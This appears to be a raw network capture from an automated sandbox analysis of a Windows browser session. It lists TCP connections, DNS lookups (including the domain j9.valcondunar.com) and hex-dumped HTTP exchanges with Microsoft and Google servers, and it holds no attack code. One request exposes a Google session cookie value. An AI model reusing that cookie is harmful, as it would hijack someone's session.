                                                                                                                    Nov 25, 2024 19:53:27.542115927 CET4434984613.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.542159081 CET4434984613.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.542351007 CET49846443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.542380095 CET49846443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.542393923 CET4434984613.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.542402983 CET49846443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.542407036 CET4434984613.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.544622898 CET49850443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.544653893 CET4434985013.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.544747114 CET49850443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.544874907 CET49850443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.544883966 CET4434985013.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.547686100 CET4434984513.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.547734976 CET4434984513.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.547852993 CET49845443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.547853947 CET49845443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.547878027 CET49845443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.547897100 CET4434984513.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.549510002 CET49851443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.549531937 CET4434985113.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.549602032 CET49851443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.549696922 CET49851443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.549705029 CET4434985113.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.810663939 CET4434984813.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.810719013 CET4434984813.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.810856104 CET49848443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.810875893 CET49848443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.810883999 CET4434984813.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.810894966 CET49848443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.810899973 CET4434984813.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.812742949 CET49852443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.812777996 CET4434985213.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.812850952 CET49852443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.812989950 CET49852443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.813003063 CET4434985213.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.857084990 CET4434984713.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.857134104 CET4434984713.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.857372999 CET49847443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.857784033 CET49847443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.857784033 CET49847443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.857799053 CET4434984713.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.857808113 CET4434984713.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.859142065 CET49853443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.859225988 CET4434985313.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.859303951 CET49853443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.859394073 CET49853443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.859416008 CET4434985313.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.961520910 CET4434984913.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.961574078 CET4434984913.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.961687088 CET49849443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.961811066 CET49849443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.961811066 CET49849443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.961822033 CET4434984913.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.961828947 CET4434984913.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.963598967 CET49854443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.963613987 CET4434985413.107.246.63192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:27.963798046 CET49854443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.963932037 CET49854443192.168.2.413.107.246.63
                                                                                                                    Nov 25, 2024 19:53:27.963942051 CET4434985413.107.246.63192.168.2.4
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 25, 2024 19:52:09.512850046 CET53621931.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:09.520986080 CET53650981.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:10.978655100 CET53503291.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:12.210391998 CET53593311.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:13.365571022 CET5365653192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:13.365705967 CET5995153192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:13.509576082 CET53536561.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:13.509588957 CET53599511.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:13.812069893 CET53563511.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:13.897856951 CET5112753192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:13.897967100 CET5092053192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:14.075706005 CET53509201.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:14.075716972 CET53511271.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:16.927782059 CET5449853192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:16.927933931 CET6365753192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:17.092924118 CET53544981.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:17.093841076 CET53636571.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:19.186960936 CET53517261.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:21.736696005 CET6058353192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:21.736876011 CET5530853192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:21.888273001 CET53605831.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:21.888375998 CET53553081.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:23.357664108 CET53597771.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:25.098467112 CET53555551.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.200321913 CET5172353192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:27.200509071 CET6476453192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:27.346191883 CET53647641.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.346204042 CET53517231.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:27.701607943 CET53567291.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.339478016 CET53567871.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:29.704200029 CET138138192.168.2.4192.168.2.255
                                                                                                                    Nov 25, 2024 19:52:35.805206060 CET5367353192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:35.805443048 CET4989253192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:36.127775908 CET53498921.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:36.128113985 CET53536731.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:39.999713898 CET5444853192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:39.999891996 CET5383153192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:40.138819933 CET53544481.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:40.139782906 CET53538311.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.236759901 CET5685453192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:42.237245083 CET5382653192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:42.258057117 CET5173553192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:42.258326054 CET6088353192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:42.376923084 CET53568541.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.381279945 CET53538261.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.396928072 CET53517351.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.413108110 CET53503031.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:42.488961935 CET53608831.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:45.976114988 CET6257753192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:45.976547003 CET5345353192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:46.246619940 CET53625771.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.247797966 CET53534531.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.801729918 CET6324053192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:46.801862001 CET5370453192.168.2.41.1.1.1
                                                                                                                    Nov 25, 2024 19:52:46.939388037 CET53537041.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:46.939557076 CET53632401.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:52:48.092166901 CET53522891.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:09.012031078 CET53552451.1.1.1192.168.2.4
                                                                                                                    Nov 25, 2024 19:53:10.689105988 CET53600531.1.1.1192.168.2.4
                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                    Nov 25, 2024 19:52:10.978715897 CET192.168.2.41.1.1.1c218(Port unreachable)Destination Unreachable
                                                                                                                    Nov 25, 2024 19:52:42.489032984 CET192.168.2.41.1.1.1c249(Port unreachable)Destination Unreachable
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 25, 2024 19:52:13.365571022 CET192.168.2.41.1.1.10xeff5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:13.365705967 CET192.168.2.41.1.1.10xa974Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:13.897856951 CET192.168.2.41.1.1.10xf63cStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:13.897967100 CET192.168.2.41.1.1.10xd5b7Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:16.927782059 CET192.168.2.41.1.1.10xf9c5Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:16.927933931 CET192.168.2.41.1.1.10x9b12Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:21.736696005 CET192.168.2.41.1.1.10xb53eStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:21.736876011 CET192.168.2.41.1.1.10xb037Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:27.200321913 CET192.168.2.41.1.1.10x702fStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:27.200509071 CET192.168.2.41.1.1.10x8bf2Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:35.805206060 CET192.168.2.41.1.1.10x53f5Standard query (0)j9.valcondunar.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:35.805443048 CET192.168.2.41.1.1.10x2281Standard query (0)j9.valcondunar.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:39.999713898 CET192.168.2.41.1.1.10xd6c0Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:39.999891996 CET192.168.2.41.1.1.10xfaabStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.236759901 CET192.168.2.41.1.1.10x1932Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.237245083 CET192.168.2.41.1.1.10x30bcStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.258057117 CET192.168.2.41.1.1.10x7b05Standard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.258326054 CET192.168.2.41.1.1.10x21a8Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:45.976114988 CET192.168.2.41.1.1.10x364cStandard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:45.976547003 CET192.168.2.41.1.1.10x2415Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:46.801729918 CET192.168.2.41.1.1.10x12e9Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:46.801862001 CET192.168.2.41.1.1.10xef16Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 25, 2024 19:52:13.509576082 CET1.1.1.1192.168.2.40xeff5No error (0)www.google.com216.58.208.228A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:13.509588957 CET1.1.1.1192.168.2.40xa974No error (0)www.google.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:14.075706005 CET1.1.1.1192.168.2.40xd5b7No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:14.075716972 CET1.1.1.1192.168.2.40xf63cNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:14.075716972 CET1.1.1.1192.168.2.40xf63cNo error (0)plus.l.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:17.092924118 CET1.1.1.1192.168.2.40xf9c5No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:17.092924118 CET1.1.1.1192.168.2.40xf9c5No error (0)plus.l.google.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:17.093841076 CET1.1.1.1192.168.2.40x9b12No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:21.888273001 CET1.1.1.1192.168.2.40xb53eNo error (0)play.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:27.346204042 CET1.1.1.1192.168.2.40x702fNo error (0)play.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:36.127775908 CET1.1.1.1192.168.2.40x2281No error (0)j9.valcondunar.com65IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:36.128113985 CET1.1.1.1192.168.2.40x53f5No error (0)j9.valcondunar.com104.21.68.132A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:36.128113985 CET1.1.1.1192.168.2.40x53f5No error (0)j9.valcondunar.com172.67.195.202A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:40.138819933 CET1.1.1.1192.168.2.40xd6c0No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:40.138819933 CET1.1.1.1192.168.2.40xd6c0No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:40.138819933 CET1.1.1.1192.168.2.40xd6c0No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:40.138819933 CET1.1.1.1192.168.2.40xd6c0No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.376923084 CET1.1.1.1192.168.2.40x1932No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.376923084 CET1.1.1.1192.168.2.40x1932No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.376923084 CET1.1.1.1192.168.2.40x1932No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.376923084 CET1.1.1.1192.168.2.40x1932No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.396928072 CET1.1.1.1192.168.2.40x7b05No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.396928072 CET1.1.1.1192.168.2.40x7b05No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:42.488961935 CET1.1.1.1192.168.2.40x21a8No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:46.246619940 CET1.1.1.1192.168.2.40x364cNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:46.246619940 CET1.1.1.1192.168.2.40x364cNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:46.247797966 CET1.1.1.1192.168.2.40x2415No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 25, 2024 19:52:46.939557076 CET1.1.1.1192.168.2.40x12e9No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                    • fs.microsoft.com
                                                                                                                    • apis.google.com
                                                                                                                    • https:
                                                                                                                      • play.google.com
                                                                                                                      • www.google.com
                                                                                                                      • j9.valcondunar.com
                                                                                                                      • code.jquery.com
                                                                                                                      • blogger.googleusercontent.com
                                                                                                                    • slscr.update.microsoft.com
                                                                                                                    • a.nel.cloudflare.com
                                                                                                                    • otelrules.azureedge.net
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.4497502.18.109.164443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:15 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: identity
                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                    Host: fs.microsoft.com
                                                                                                                    2024-11-25 18:52:16 UTC478INHTTP/1.1 200 OK
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Server: Kestrel
                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                    X-Ms-Region: prod-eus-z1
                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                    X-OSID: 2
                                                                                                                    X-CID: 2
                                                                                                                    X-CCC: GB
                                                                                                                    Cache-Control: public, max-age=52840
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:15 GMT
                                                                                                                    Connection: close
                                                                                                                    X-CID: 2


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.4497512.18.109.164443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:17 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: identity
                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                    Range: bytes=0-2147483646
                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                    Host: fs.microsoft.com
                                                                                                                    2024-11-25 18:52:18 UTC534INHTTP/1.1 200 OK
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                    Cache-Control: public, max-age=52863
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:18 GMT
                                                                                                                    Content-Length: 55
                                                                                                                    Connection: close
                                                                                                                    X-CID: 2
                                                                                                                    2024-11-25 18:52:18 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449753142.250.181.784432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:18 UTC668OUTGET /js/client.js?onload=gapiLoaded HTTP/1.1
                                                                                                                    Host: apis.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: */*
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: NID=519=gdyYGrV8wKESt6T7PJLfWqt4Fh4r5I8B97r0VfkrSsZYkNs9vowLpX0djHp_EkSdUswtFE_sLpxHs7b6849m7NndCgLPAVG8HqCcH_dihgE4Hhscjgw_FuB7NL3gBhSStO8oWnVObBaYEPOp3WCdhOe5I9Pgs_3PCmwsXD9O8mEyNYNyWCgb8nxu
                                                                                                                    2024-11-25 18:52:19 UTC837INHTTP/1.1 200 OK
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Type: text/javascript
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gapi-team
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="gapi-team"
                                                                                                                    Report-To: {"group":"gapi-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gapi-team"}]}
                                                                                                                    Timing-Allow-Origin: *
                                                                                                                    Content-Length: 14469
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:19 GMT
                                                                                                                    Expires: Mon, 25 Nov 2024 18:52:19 GMT
                                                                                                                    Cache-Control: private, max-age=1800, stale-while-revalidate=1800
                                                                                                                    ETag: "5260c790e838b34d"
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Server: sffe
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2024-11-25 18:52:19 UTC553INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 2c 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e
                                                                                                                    Data Ascii: (function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof win
                                                                                                                    2024-11-25 18:52:19 UTC1390INData Raw: 62 72 65 61 6b 20 61 3b 63 3d 63 5b 65 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 63 5b 61 5d 3b 62 3d 62 28 64 29 3b 62 21 3d 64 26 26 62 21 3d 6e 75 6c 6c 26 26 61 61 28 63 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 7d 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78
                                                                                                                    Data Ascii: break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegEx
